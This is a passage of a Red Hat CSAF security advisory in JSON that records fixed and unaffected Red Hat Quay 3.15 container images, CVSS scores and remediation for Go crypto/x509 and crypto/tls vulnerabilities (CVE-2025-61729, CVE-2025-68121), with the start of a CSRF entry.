"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2418462"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61729"
},
{
"category": "external",
"summary": "RHBZ#2418462",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418462"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61729"
},
{
"category": "external",
"summary": "https://go.dev/cl/725920",
"url": "https://go.dev/cl/725920"
},
{
"category": "external",
"summary": "https://go.dev/issue/76445",
"url": "https://go.dev/issue/76445"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4",
"url": "https://groups.google.com/g/golang-announce/c/8FJoBkPddm4"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2025-4155",
"url": "https://pkg.go.dev/vuln/GO-2025-4155"
}
],
"release_date": "2025-12-02T18:54:10.166000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "crypto/x509: golang: Denial of Service due to excessive resource consumption via crafted certificate"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2025-68158",
"cwe": {
"id": "CWE-352",
"name": "Cross-Site Request Forgery (CSRF)"
},
"discovery_date": "2026-01-08T19:01:41.615962+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
